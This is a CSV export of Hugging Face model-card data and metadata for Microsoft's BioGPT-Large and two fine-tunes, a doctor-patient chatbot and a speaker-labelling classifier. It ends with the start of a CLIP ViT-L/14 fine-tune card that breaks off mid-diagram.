|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
microsoft/BioGPT-Large,"---
|
| 3 |
+
license: mit
|
| 4 |
+
datasets:
|
| 5 |
+
- pubmed
|
| 6 |
+
language:
|
| 7 |
+
- en
|
| 8 |
+
library_name: transformers
|
| 9 |
+
pipeline_tag: text-generation
|
| 10 |
+
tags:
|
| 11 |
+
- medical
|
| 12 |
+
widget:
|
| 13 |
+
- text: COVID-19 is
|
| 14 |
+
inference:
|
| 15 |
+
parameters:
|
| 16 |
+
max_new_tokens: 50
|
| 17 |
+
---
|
| 18 |
+
|
| 19 |
+
## BioGPT
|
| 20 |
+
|
| 21 |
+
Pre-trained language models have attracted increasing attention in the biomedical domain, inspired by their great success in the general natural language domain. Among the two main branches of pre-trained language models in the general language domain, i.e. BERT (and its variants) and GPT (and its variants), the first one has been extensively studied in the biomedical domain, such as BioBERT and PubMedBERT. While they have achieved great success on a variety of discriminative downstream biomedical tasks, the lack of generation ability constrains their application scope. In this paper, we propose BioGPT, a domain-specific generative Transformer language model pre-trained on large-scale biomedical literature. We evaluate BioGPT on six biomedical natural language processing tasks and demonstrate that our model outperforms previous models on most tasks. Especially, we get 44.98%, 38.42% and 40.76% F1 score on BC5CDR, KD-DTI and DDI end-to-end relation extraction tasks, respectively, and 78.2% accuracy on PubMedQA, creating a new record. Our case study on text generation further demonstrates the advantage of BioGPT on biomedical literature to generate fluent descriptions for biomedical terms.
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+
## Citation
|
| 25 |
+
|
| 26 |
+
If you find BioGPT useful in your research, please cite the following paper:
|
| 27 |
+
|
| 28 |
+
```latex
|
| 29 |
+
@article{10.1093/bib/bbac409,
|
| 30 |
+
author = {Luo, Renqian and Sun, Liai and Xia, Yingce and Qin, Tao and Zhang, Sheng and Poon, Hoifung and Liu, Tie-Yan},
|
| 31 |
+
title = ""{BioGPT: generative pre-trained transformer for biomedical text generation and mining}"",
|
| 32 |
+
journal = {Briefings in Bioinformatics},
|
| 33 |
+
volume = {23},
|
| 34 |
+
number = {6},
|
| 35 |
+
year = {2022},
|
| 36 |
+
month = {09},
|
| 37 |
+
abstract = ""{Pre-trained language models have attracted increasing attention in the biomedical domain, inspired by their great success in the general natural language domain. Among the two main branches of pre-trained language models in the general language domain, i.e. BERT (and its variants) and GPT (and its variants), the first one has been extensively studied in the biomedical domain, such as BioBERT and PubMedBERT. While they have achieved great success on a variety of discriminative downstream biomedical tasks, the lack of generation ability constrains their application scope. In this paper, we propose BioGPT, a domain-specific generative Transformer language model pre-trained on large-scale biomedical literature. We evaluate BioGPT on six biomedical natural language processing tasks and demonstrate that our model outperforms previous models on most tasks. Especially, we get 44.98\%, 38.42\% and 40.76\% F1 score on BC5CDR, KD-DTI and DDI end-to-end relation extraction tasks, respectively, and 78.2\% accuracy on PubMedQA, creating a new record. Our case study on text generation further demonstrates the advantage of BioGPT on biomedical literature to generate fluent descriptions for biomedical terms.}"",
|
| 38 |
+
issn = {1477-4054},
|
| 39 |
+
doi = {10.1093/bib/bbac409},
|
| 40 |
+
url = {https://doi.org/10.1093/bib/bbac409},
|
| 41 |
+
note = {bbac409},
|
| 42 |
+
eprint = {https://academic.oup.com/bib/article-pdf/23/6/bbac409/47144271/bbac409.pdf},
|
| 43 |
+
}
|
| 44 |
+
```","{""id"": ""microsoft/BioGPT-Large"", ""author"": ""microsoft"", ""sha"": ""c6a5136a91c5e3150d9f05ab9d33927a3210a22e"", ""last_modified"": ""2023-02-05 06:18:14+00:00"", ""created_at"": ""2023-02-03 16:17:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 7980, ""downloads_all_time"": null, ""likes"": 196, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""biogpt"", ""text-generation"", ""medical"", ""en"", ""dataset:pubmed"", ""license:mit"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- pubmed\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\npipeline_tag: text-generation\ntags:\n- medical\nwidget:\n- text: COVID-19 is\ninference:\n parameters:\n max_new_tokens: 50"", ""widget_data"": [{""text"": ""COVID-19 is""}], ""model_index"": null, ""config"": {""architectures"": [""BioGptForCausalLM""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""katielink/biogpt-large-demo"", ""Sharathhebbar24/One-stop-for-Open-source-models"", ""kadirnar/Whisper_M2M100_BioGpt"", ""katielink/compare-bio-llm"", ""flash64/biogpt-testing"", ""MMYang/microsoft-BioGPT-Large"", ""MohammedAlakhras/ChatDoctor"", ""RamboRogers/BioGPT"", ""arohcx/colab"", ""Vrda/microsoft-BioGPT-Large"", ""partnersfactory/microsoft-BioGPT-Large"", ""Mzeshle/microsoft-BioGPT-Large"", ""ZaddyMattty/microsoft-BioGPT-Large"", ""caliex/demo-med"", ""yejunbin/microsoft-BioGPT-Large"", ""yuzhengao/microsoft-BioGPT-Large"", ""Huggingmaces/microsoft-BioGPT-Large"", ""vlad-htg/microsoft-BioGPT-Large"", ""ayub567/medaichatbot"", ""ameykalpe/microsoft-BioGPT-Large"", ""UraniaLi/Energenesis_Biomedical_AI"", ""Yossefahmed68/microsoft-BioGPT-Large"", ""Krystal5299/microsoft-BioGPT-Large"", ""Ashraf/BioGPT_Chat"", ""Nurpeyis/microsoft-BioGPT-Large"", ""0xgokuz/microsoft-BioGPT-Large"", ""K00B404/One-stop-till-you-drop"", ""aidevlab/BioGPT_text_generation"", ""zaikaman/AIDoctor"", ""ihkaraman/medical-chatbot"", ""SeemaSaharan/Diagnosis_Clinical"", ""nroy8/symptom-checker-ai"", ""Ravithreni4/AI-Health-Assistent"", ""Ravithreni4/Health-Assistent"", ""drkareemkamal/pediatric_RAG"", ""S0umya/canceropinion.ai"", ""anaghanagesh/drug_discovery_using_LLMs"", ""anaghanagesh/Drug_Discovery_using_LLMs_"", ""kseth9852/health_report_analysis""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-02-05 06:18:14+00:00"", ""cardData"": ""datasets:\n- pubmed\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\npipeline_tag: text-generation\ntags:\n- medical\nwidget:\n- text: COVID-19 is\ninference:\n parameters:\n max_new_tokens: 50"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""63dd3396327159311ac515f7"", ""modelId"": ""microsoft/BioGPT-Large"", ""usedStorage"": 12569856117}",0,"https://huggingface.co/RobCzikkel/DoctorGPT, https://huggingface.co/Shaheer14326/Fine_tunned_Biogpt",2,,0,,0,,0,"MMYang/microsoft-BioGPT-Large, MohammedAlakhras/ChatDoctor, RamboRogers/BioGPT, Sharathhebbar24/One-stop-for-Open-source-models, anaghanagesh/Drug_Discovery_using_LLMs_, anaghanagesh/drug_discovery_using_LLMs, flash64/biogpt-testing, huggingface/InferenceSupport/discussions/1109, kadirnar/Whisper_M2M100_BioGpt, katielink/biogpt-large-demo, katielink/compare-bio-llm, nroy8/symptom-checker-ai, zaikaman/AIDoctor",13
|
| 45 |
+
RobCzikkel/DoctorGPT,"---
|
| 46 |
+
license: mit
|
| 47 |
+
base_model: microsoft/BioGPT-Large
|
| 48 |
+
tags:
|
| 49 |
+
- generated_from_trainer
|
| 50 |
+
model-index:
|
| 51 |
+
- name: bioGPT
|
| 52 |
+
results: []
|
| 53 |
+
---
|
| 54 |
+
|
| 55 |
+
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
|
| 56 |
+
should probably proofread and complete it, then remove this comment. -->
|
| 57 |
+
|
| 58 |
+
# DoctorGPT
|
| 59 |
+
|
| 60 |
+
This model is a fine-tuned version of [microsoft/BioGPT-Large](https://huggingface.co/microsoft/BioGPT-Large) on a formatted version of the MedQuad-MedicalQnADataset dataset.
|
| 61 |
+
It achieves the following results on the evaluation set:
|
| 62 |
+
- Loss: 1.1114
|
| 63 |
+
|
| 64 |
+
## Model description
|
| 65 |
+
|
| 66 |
+
The base model used is Microsoft's BioGPT, it was fine-tuned with a custom prompt for a conversational chatbot between a patient and a doctor.
|
| 67 |
+
The prompt used is as follows:
|
| 68 |
+
|
| 69 |
+
```py
|
| 70 |
+
""""""You are a Doctor. Below is a question from a patient. Write a response to the patient that answers their question\n\n""
|
| 71 |
+
|
| 72 |
+
### Patient: {question}""
|
| 73 |
+
|
| 74 |
+
### Doctor: {answer}
|
| 75 |
+
""""""
|
| 76 |
+
```
|
| 77 |
+
|
| 78 |
+
## Inference
|
| 79 |
+
|
| 80 |
+
The fine-tuned model has a saved generation config, to use it:
|
| 81 |
+
```py
|
| 82 |
+
model_config = GenerationConfig.from_pretrained(
|
| 83 |
+
DoctorGPT
|
| 84 |
+
)
|
| 85 |
+
```
|
| 86 |
+
|
| 87 |
+
This config is a diverse beam search strategy:
|
| 88 |
+
```py
|
| 89 |
+
diversebeamConfig = GenerationConfig(
|
| 90 |
+
min_length=20,
|
| 91 |
+
max_length=256,
|
| 92 |
+
do_sample=False,
|
| 93 |
+
num_beams=4,
|
| 94 |
+
num_beam_groups=4,
|
| 95 |
+
diversity_penalty=1.0,
|
| 96 |
+
repetition_penalty=3.0,
|
| 97 |
+
eos_token_id=model.config.eos_token_id,
|
| 98 |
+
pad_token_id=model.config.pad_token_id,
|
| 99 |
+
bos_token_id=model.config.bos_token_id,
|
| 100 |
+
)
|
| 101 |
+
```
|
| 102 |
+
|
| 103 |
+
For best results, please use this as your generator function:
|
| 104 |
+
```py
|
| 105 |
+
def generate(query):
|
| 106 |
+
sys = ""You are a Doctor. Below is a question from a patient. Write a response to the patient that answers their question\n\n""
|
| 107 |
+
patient = f""### Patient:\n{query}\n\n""
|
| 108 |
+
doctor = f""### Doctor:\n ""
|
| 109 |
+
|
| 110 |
+
prompt = sys+patient+doctor
|
| 111 |
+
|
| 112 |
+
inputs = tokenizer(prompt, return_tensors=""pt"").to(""cuda"")
|
| 113 |
+
generated_ids = model.generate(
|
| 114 |
+
**inputs,
|
| 115 |
+
generation_config=generation_config,
|
| 116 |
+
)
|
| 117 |
+
outputs = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)
|
| 118 |
+
answer = '.'.join(answer.split('.')[:-1])
|
| 119 |
+
torch.cuda.empty_cache()
|
| 120 |
+
return answer + "".""
|
| 121 |
+
```
|
| 122 |
+
|
| 123 |
+
|
| 124 |
+
## Intended uses & limitations
|
| 125 |
+
|
| 126 |
+
This is a private project for fine-tuning a medical language model, it is not intended to be used as a source of medical advice.
|
| 127 |
+
|
| 128 |
+
## Training and evaluation data
|
| 129 |
+
|
| 130 |
+
More information needed
|
| 131 |
+
|
| 132 |
+
## Training procedure
|
| 133 |
+
|
| 134 |
+
### Training hyperparameters
|
| 135 |
+
|
| 136 |
+
The following hyperparameters were used during training:
|
| 137 |
+
- learning_rate: 0.0005
|
| 138 |
+
- train_batch_size: 4
|
| 139 |
+
- eval_batch_size: 4
|
| 140 |
+
- seed: 42
|
| 141 |
+
- gradient_accumulation_steps: 16
|
| 142 |
+
- total_train_batch_size: 64
|
| 143 |
+
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
|
| 144 |
+
- lr_scheduler_type: cosine
|
| 145 |
+
- lr_scheduler_warmup_ratio: 0.03
|
| 146 |
+
- num_epochs: 3
|
| 147 |
+
- mixed_precision_training: Native AMP
|
| 148 |
+
|
| 149 |
+
### Training results
|
| 150 |
+
|
| 151 |
+
| Training Loss | Epoch | Step | Validation Loss |
|
| 152 |
+
|:-------------:|:-----:|:----:|:---------------:|
|
| 153 |
+
| No log | 0.25 | 51 | 1.2418 |
|
| 154 |
+
| 1.3267 | 0.5 | 102 | 1.1900 |
|
| 155 |
+
| 1.3267 | 0.75 | 153 | 1.1348 |
|
| 156 |
+
| 1.1237 | 0.99 | 204 | 1.0887 |
|
| 157 |
+
| 1.1237 | 1.24 | 255 | 1.1018 |
|
| 158 |
+
| 0.7527 | 1.49 | 306 | 1.0770 |
|
| 159 |
+
| 0.7527 | 1.74 | 357 | 1.0464 |
|
| 160 |
+
| 0.7281 | 1.99 | 408 | 1.0233 |
|
| 161 |
+
| 0.7281 | 2.24 | 459 | 1.1212 |
|
| 162 |
+
| 0.4262 | 2.49 | 510 | 1.1177 |
|
| 163 |
+
| 0.4262 | 2.73 | 561 | 1.1125 |
|
| 164 |
+
| 0.4124 | 2.98 | 612 | 1.1114 |
|
| 165 |
+
|
| 166 |
+
|
| 167 |
+
### Framework versions
|
| 168 |
+
|
| 169 |
+
- Transformers 4.36.0.dev0
|
| 170 |
+
- Pytorch 2.1.0+cu118
|
| 171 |
+
- Datasets 2.15.0
|
| 172 |
+
- Tokenizers 0.15.0
|
| 173 |
+
","{""id"": ""RobCzikkel/DoctorGPT"", ""author"": ""RobCzikkel"", ""sha"": ""19413de7929ec6249358a48b5a8a8aea403a74df"", ""last_modified"": ""2023-12-04 17:49:55+00:00"", ""created_at"": ""2023-11-25 02:40:31+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 17, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""tensorboard"", ""safetensors"", ""biogpt"", ""text-generation"", ""generated_from_trainer"", ""base_model:microsoft/BioGPT-Large"", ""base_model:finetune:microsoft/BioGPT-Large"", ""license:mit"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/BioGPT-Large\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: bioGPT\n results: []"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": [{""name"": ""bioGPT"", ""results"": []}], ""config"": {""architectures"": [""BioGptForCausalLM""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_21-12-11_87f33704e632/events.out.tfevents.1700860339.87f33704e632.744.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_21-16-03_87f33704e632/events.out.tfevents.1700860578.87f33704e632.4122.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='runs/Nov24_23-16-13_87f33704e632/events.out.tfevents.1700867787.87f33704e632.35427.0', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""0xgokuz/RobCzikkel-DoctorGPT""], ""safetensors"": {""parameters"": {""F32"": 1571188800}, ""total"": 1571188800}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-12-04 17:49:55+00:00"", ""cardData"": ""base_model: microsoft/BioGPT-Large\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: bioGPT\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""65615e9f49f816b798400a06"", ""modelId"": ""RobCzikkel/DoctorGPT"", ""usedStorage"": 6284863196}",1,,0,,0,,0,,0,"0xgokuz/RobCzikkel-DoctorGPT, huggingface/InferenceSupport/discussions/new?title=RobCzikkel/DoctorGPT&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BRobCzikkel%2FDoctorGPT%5D(%2FRobCzikkel%2FDoctorGPT)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
|
| 174 |
+
Shaheer14326/Fine_tunned_Biogpt,"---
|
| 175 |
+
license: mit
|
| 176 |
+
language:
|
| 177 |
+
- en
|
| 178 |
+
base_model:
|
| 179 |
+
- microsoft/BioGPT-Large
|
| 180 |
+
---
|
| 181 |
+
This is a fine tunned version of Bio GPT to analyze the doctor and patient conversation converted into text using whisper and then label the text as doctor or patient","{""id"": ""Shaheer14326/Fine_tunned_Biogpt"", ""author"": ""Shaheer14326"", ""sha"": ""0009f3651d98954a1cad147daf0cdfc90b8c6b87"", ""last_modified"": ""2025-02-25 21:17:52+00:00"", ""created_at"": ""2025-02-25 21:04:24+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""biogpt"", ""en"", ""base_model:microsoft/BioGPT-Large"", ""base_model:finetune:microsoft/BioGPT-Large"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- microsoft/BioGPT-Large\nlanguage:\n- en\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BioGptForSequenceClassification""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 346765312}, ""total"": 346765312}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-25 21:17:52+00:00"", ""cardData"": ""base_model:\n- microsoft/BioGPT-Large\nlanguage:\n- en\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""67be305890cc736e2f89a8f9"", ""modelId"": ""Shaheer14326/Fine_tunned_Biogpt"", ""usedStorage"": 1387103856}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=Shaheer14326/Fine_tunned_Biogpt&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BShaheer14326%2FFine_tunned_Biogpt%5D(%2FShaheer14326%2FFine_tunned_Biogpt)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
BiomedNLP-BiomedBERT-base-uncased-abstract-fulltext_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
CLIP-GmP-ViT-L-14_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,127 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
zer0int/CLIP-GmP-ViT-L-14,"---
|
| 3 |
+
license: mit
|
| 4 |
+
base_model: openai/clip-vit-large-patch14
|
| 5 |
+
datasets:
|
| 6 |
+
- SPRIGHT-T2I/spright_coco
|
| 7 |
+
---
|
| 8 |
+
## A fine-tune of CLIP-L. Original model: [openai/clip-vit-large-patch14](https://huggingface.co/openai/clip-vit-large-patch14)
|
| 9 |
+
- ❤️ this CLIP? [Help feed it](https://ko-fi.com/zer0int) if you can. Besides data, CLIP eats time & expensive electricity of DE. TY! 🤗
|
| 10 |
+
- Want to feed it yourself? All code for fine-tuning and much more is on [my GitHub](https://github.com/zer0int).
|
| 11 |
+
-----
|
| 12 |
+
## Update 23/SEP/2024:
|
| 13 |
+
- Huggingface Transformers / Diffusers pipeline now implemented.
|
| 14 |
+
- See here for an example script: [Integrating my CLIP-L with Flux.1](https://github.com/zer0int/CLIP-txt2img-diffusers-scripts)
|
| 15 |
+
- Otherwise, use as normal / any HF model:
|
| 16 |
+
```
|
| 17 |
+
from transformers import CLIPModel, CLIPProcessor, CLIPConfig
|
| 18 |
+
model_id = ""zer0int/CLIP-GmP-ViT-L-14""
|
| 19 |
+
config = CLIPConfig.from_pretrained(model_id)
|
| 20 |
+
```
|
| 21 |
+
## Update 03/SEP/2024 / edit 05/AUG:
|
| 22 |
+
|
| 23 |
+
## 👋 Looking for a Text Encoder for Flux.1 (or SD3, SDXL, SD, ...) to replace CLIP-L? 👀
|
| 24 |
+
You'll generally want the ""TE-only"" .safetensors:
|
| 25 |
+
|
| 26 |
+
- 👉 The ""TEXT"" model has superior prompt following, especially for text, but also for other details. [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-TEXT-detail-improved-hiT-GmP-TE-only-HF.safetensors)
|
| 27 |
+
- 👉 The ""SMOOTH"" model can sometimes** have better details (when there's no text in the image). [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-BEST-smooth-GmP-TE-only-HF-format.safetensors)
|
| 28 |
+
- The ""GmP"" initial fine-tune is deprecated / inferior to the above models. Still, you can [DOWNLOAD](https://huggingface.co/zer0int/CLIP-GmP-ViT-L-14/blob/main/ViT-L-14-GmP-ft-TE-only-HF-format.safetensors) it.
|
| 29 |
+
|
| 30 |
+
**: The ""TEXT"" model is the best for text. Full stop. But whether the ""SMOOTH"" model is better for your (text-free) scenario than the ""TEXT"" model really depends on the specific prompt. It might also be the case that the ""TEXT"" model leads to images that you prefer over ""SMOOTH""; the only way to know is to experiment with both.
|
| 31 |
+
|
| 32 |
+

|
| 33 |
+
|
| 34 |
+
## 🤓👨💻 In general (because we're not limited to text-to-image generative AI), I provide four versions / downloads:
|
| 35 |
+
|
| 36 |
+
- Text encoder only .safetensors.
|
| 37 |
+
- Full model .safetensors.
|
| 38 |
+
- State_dict pickle.
|
| 39 |
+
- Full model pickle (can be used as-is with ""import clip"" -> clip.load() after bypassing SHA checksum verification).
|
| 40 |
+
|
| 41 |
+
## The TEXT model has a modality gap of 0.80 (OpenAI pre-trained: 0.82).
|
| 42 |
+
- Trained with high temperature of 0.1 + tinkering.
|
| 43 |
+
- ImageNet/ObjectNet accuracy ~0.91 for both ""SMOOTH"" and ""TEXT"" models (pre-trained: ~0.84).
|
| 44 |
+
- The models (this plot = ""TEXT"" model on MSCOCO) are also golden retrievers: 🥰🐕
|
| 45 |
+
|
| 46 |
+

|
| 47 |
+
|
| 48 |
+
----
|
| 49 |
+
## Update 11/AUG/2024:
|
| 50 |
+
|
| 51 |
+
New Best-Performing CLIP ViT-L/14 'GmP-smooth' model added (simply download the files named *BEST*!):
|
| 52 |
+
|
| 53 |
+

|
| 54 |
+
|
| 55 |
+
Or just create a fine-tune yourself: [https://github.com/zer0int/CLIP-fine-tune](https://github.com/zer0int/CLIP-fine-tune)
|
| 56 |
+
|
| 57 |
+
How?
|
| 58 |
+
- Geometric Parametrization (GmP) (same as before)
|
| 59 |
+
- Activation Value manipulation for 'adverb neuron' (same as before)
|
| 60 |
+
- NEW: Custom loss function with label smoothing!
|
| 61 |
+
- For in-depth details, see my GitHub. 🤗
|
| 62 |
+
|
| 63 |
+
----
|
| 64 |
+
|
| 65 |
+
## A fine-tune of OpenAI / CLIP ViT-L/14 that has an unprecedented ImageNet/ObjectNet accuracy of ~0.90 (original pre-trained model / OpenAI's CLIP: ~0.85)**.
|
| 66 |
+
|
| 67 |
+
Made possible with Geometric Parametrization (GmP):
|
| 68 |
+
|
| 69 |
+
```
|
| 70 |
+
|
| 71 |
+
""Normal"" CLIP MLP (multi-layer perceptron):
|
| 72 |
+
|
| 73 |
+
(mlp): Sequential(
|
| 74 |
+
|-(c_fc): Linear(in_features=1024, out_features=4096, bias=True)
|
| 75 |
+
| (gelu): QuickGELU()
|
| 76 |
+
|-}-(c_proj): Linear(in_features=4096, out_features=1024, bias=True)
|
| 77 |
+
| |
|
| 78 |
+
| |-- visual.transformer.resblocks.0.mlp.c_fc.weight
|
| 79 |
+
| |-- visual.transformer.resblocks.0.mlp.c_fc.bias
|
| 80 |
+
|
|
| 81 |
+
